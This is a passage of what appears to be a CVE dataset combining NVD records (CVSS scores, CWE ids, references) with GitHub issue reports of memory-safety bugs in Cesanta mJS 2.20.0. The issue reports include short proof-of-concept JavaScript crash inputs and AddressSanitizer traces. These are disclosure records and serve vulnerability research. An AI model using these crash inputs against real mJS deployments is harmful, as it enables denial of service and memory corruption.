==109503==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000150 at pc 0x55d8ef005f6d bp 0x7ffe7d357b00 sp 0x7ffe7d357af0
READ of size 8 at 0x607000000150 thread T0
#0 0x55d8ef005f6c in mjs_array_length src/mjs_array.c:83
#1 0x55d8ef005f6c in mjs_array_push src/mjs_array.c:115
#2 0x55d8ef027dd8 in mjs_execute src/mjs_exec.c:679
#3 0x55d8ef034a05 in mjs_exec_internal src/mjs_exec.c:1073
#4 0x55d8ef034a05 in mjs_exec_file src/mjs_exec.c:1096
#5 0x55d8eeff1909 in main src/mjs_main.c:47
#6 0x7f6cb8331b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#7 0x55d8eeff2449 in _start (/usr/local/bin/Gmjs+0xe449)
0x607000000150 is located 0 bytes to the right of 80-byte region [0x607000000100,0x607000000150)
allocated by thread T0 here:
#0 0x7f6cb89e3d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55d8ef0527be in gc_new_block src/mjs_gc.c:94
#2 0x55d8ef0527be in gc_alloc_cell src/mjs_gc.c:133
#3 0x55d8ef0527be in new_object src/mjs_gc.c:45
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_array.c:83 in mjs_array_length
Shadow bytes around the buggy address:
0x0c0e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c0e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c0e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c0e7fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 fa fa fa
0x0c0e7fff8010: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
=>0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-buffer-overflow src/mjs_array.c:83 in mjs_array_length | https://api.github.com/repos/cesanta/mjs/issues/194/comments | 0 | 2021-12-31T05:36:16Z | 2021-12-31T05:36:16Z | https://github.com/cesanta/mjs/issues/194 | 1,091,426,932 | 194 | 3,143 |
CVE-2021-46520 | 2022-01-27T21:15:09.947 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_jprintf at src/mjs_util.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/193"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/193"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/193 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
gc(JSON.stringify({
translate: [
Object.create
]
}))
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x55ed154d746c bp 0x7ffdfe204f10 sp 0x7ffdfe204f00
READ of size 1 at 0x60b0000000ab thread T0
#0 0x55ed154d746b in mjs_jprintf src/mjs_util.c:61
#1 0x55ed154d746b in mjs_fprintf src/mjs_util.c:93
#2 0x55ed153d5f78 in main src/mjs_main.c:51
#3 0x7fb412720b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#4 0x55ed153d7449 in _start (/usr/local/bin/Gmjs+0xe449)
0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab)
allocated by thread T0 here:
#0 0x7fb412dd2f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55ed154e8346 in mbuf_resize src/common/mbuf.c:50
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_util.c:61 in mjs_jprintf
Shadow bytes around the buggy address:
0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa 00 00
0x0c167fff8020: 00 00 00 00 00 00 00 00 00 00 07 fa fa fa fa fa
0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-buffer-overflow src/mjs_util.c:61 in mjs_jprintf | https://api.github.com/repos/cesanta/mjs/issues/193/comments | 0 | 2021-12-31T05:35:03Z | 2021-12-31T05:35:03Z | https://github.com/cesanta/mjs/issues/193 | 1,091,426,673 | 193 | 3,144 |
CVE-2021-46521 | 2022-01-27T21:15:09.990 | Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via c_vsnprintf at mjs/src/common/str_util.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/190"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/190"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/cesanta/mjs/issues/190 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((JSON.parse - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])]));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
==61818==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064c54a at pc 0x0000005ea260 bp 0x7fff3bbcc940 sp 0x7fff3bbcc938
WRITE of size 4 at 0x00000064c54a thread T0
#0 0x5ea25f in c_vsnprintf /root/mjs/src/common/str_util.c:180:14
#1 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5
#2 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11
#3 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11
#4 0x7f1016453b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
#5 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
0x00000064c54a is located 54 bytes to the left of global variable '<string literal>' defined in 'src/mjs_util.c:125:7' (0x64c580) of size 15
'<string literal>' is ascii string 'src/mjs_util.c'
0x00000064c54b is located 0 bytes to the right of global variable '<string literal>' defined in 'src/mjs_util.c:120:30' (0x64c540) of size 11
'<string literal>' is ascii string ' %-3u %-8s'
SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/common/str_util.c:180:14 in c_vsnprintf
Shadow bytes around the buggy address:
0x0000800c1850: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
0x0000800c1860: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
0x0000800c1870: 06 f9 f9 f9 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
0x0000800c1880: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
0x0000800c1890: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
=>0x0000800c18a0: 00 04 f9 f9 f9 f9 f9 f9 00[03]f9 f9 f9 f9 f9 f9
0x0000800c18b0: 00 07 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0000800c18c0: 07 f9 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9
0x0000800c18d0: 00 02 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
0x0000800c18e0: 00 00 04 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9
0x0000800c18f0: 02 f9 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==61818==ABORTING
```
Credits: Found by OWL337 team. | Global-buffer-overflow mjs/src/common/str_util.c:180:14 in c_vsnprintf | https://api.github.com/repos/cesanta/mjs/issues/190/comments | 0 | 2021-12-31T05:25:14Z | 2022-01-12T02:18:45Z | https://github.com/cesanta/mjs/issues/190 | 1,091,424,729 | 190 | 3,145 |
CVE-2021-46522 | 2022-01-27T21:15:10.033 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/196"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/196 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
function JSEtest(a) {
let arr = ['prototype'.indexOf(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp']))];
if (a < 10)
JSEtest(a + 1);
}
JSEtest(0);
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x7fabea0b7f54 bp 0x7ffdfc32c250 sp 0x7ffdfc32b9f8
READ of size 19 at 0x60b0000000ab thread T0
#0 0x7fabea0b7f53 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)
#1 0x55e0e1aa2ff6 in mg_strstr src/common/mg_str.c:154
#2 0x55e0e1a6c363 in mjs_string_index_of src/mjs_string.c:366
#3 0x55e0e19c5244 in mjs_execute src/mjs_exec.c:853
#4 0x55e0e19cea05 in mjs_exec_internal src/mjs_exec.c:1073
#5 0x55e0e19cea05 in mjs_exec_file src/mjs_exec.c:1096
#6 0x55e0e198b909 in main src/mjs_main.c:47
#7 0x7fabe9a34b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#8 0x55e0e198c449 in _start (/usr/local/bin/Gmjs+0xe449)
0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab)
allocated by thread T0 here:
#0 0x7fabea0e6f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55e0e1a9d346 in mbuf_resize src/common/mbuf.c:50
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)
Shadow bytes around the buggy address:
0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa fd fd
0x0c167fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) | https://api.github.com/repos/cesanta/mjs/issues/196/comments | 0 | 2021-12-31T05:38:16Z | 2022-01-12T02:19:08Z | https://github.com/cesanta/mjs/issues/196 | 1,091,427,319 | 196 | 3,146 |
CVE-2021-46523 | 2022-01-27T21:15:10.077 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via to_json_or_debug at mjs/src/mjs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/198"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/198"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/198 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((JSON.stringify - 6.5 - 321e2)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
==122636==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500000007f at pc 0x00000057b751 bp 0x7fff091bd080 sp 0x7fff091bd078
WRITE of size 1 at 0x61500000007f thread T0
#0 0x57b750 in to_json_or_debug /root/mjs/src/mjs_json.c:154:13
#1 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5
#2 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11
#3 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11
#4 0x7f2516c85b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
#5 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
0x61500000007f is located 1 bytes to the left of 472-byte region [0x615000000080,0x615000000258)
allocated by thread T0 here:
#0 0x4da3a8 in calloc (/usr/local/bin/mjs+0x4da3a8)
#1 0x538c1a in mjs_create /root/mjs/src/mjs_core.c:74:21
#2 0x5817e1 in main /root/mjs/src/mjs_main.c:17:21
#3 0x7f2516c85b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/mjs/src/mjs_json.c:154:13 in to_json_or_debug
Shadow bytes around the buggy address:
0x0c2a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c2a7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c2a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==122636==ABORTING
```
Credits: Found by OWL337 team. | Heap-buffer-overflow mjs/src/mjs_json.c:154:13 in to_json_or_debug | https://api.github.com/repos/cesanta/mjs/issues/198/comments | 0 | 2021-12-31T05:40:39Z | 2022-01-12T02:19:30Z | https://github.com/cesanta/mjs/issues/198 | 1,091,427,798 | 198 | 3,147 |
CVE-2021-46524 | 2022-01-27T21:15:10.117 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via snquote at mjs/src/mjs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/192"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/192"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/192 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
